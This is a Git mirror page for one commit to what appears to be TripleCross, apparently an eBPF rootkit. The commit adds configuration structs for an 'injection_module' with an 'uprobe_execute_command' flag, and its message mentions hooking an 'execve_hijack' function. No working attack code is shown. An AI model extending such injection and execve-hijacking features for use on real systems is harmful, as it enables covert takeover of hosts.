mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-25 19:03:07 +08:00
Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack.
This commit is contained in:
@@ -35,6 +35,11 @@ typedef struct module_config_t{
|
||||
char tp_sys_enter_execve;
|
||||
}exec_module;
|
||||
|
||||
struct injection_module {
|
||||
char all;
|
||||
char uprobe_execute_command;
|
||||
}injection_module;
|
||||
|
||||
} module_config_t;
|
||||
|
||||
//Configuration struct. Used by the module manager to
|
||||
@@ -58,6 +63,10 @@ typedef struct module_config_attr_t{
|
||||
void* __empty;
|
||||
}exec_module;
|
||||
|
||||
struct injection_module_attr {
|
||||
void* __empty;
|
||||
}injection_module;
|
||||
|
||||
} module_config_attr_t;
|
||||
|
||||
//An unique module configutation struct and attr
|
||||
|
||||
Reference in New Issue
Block a user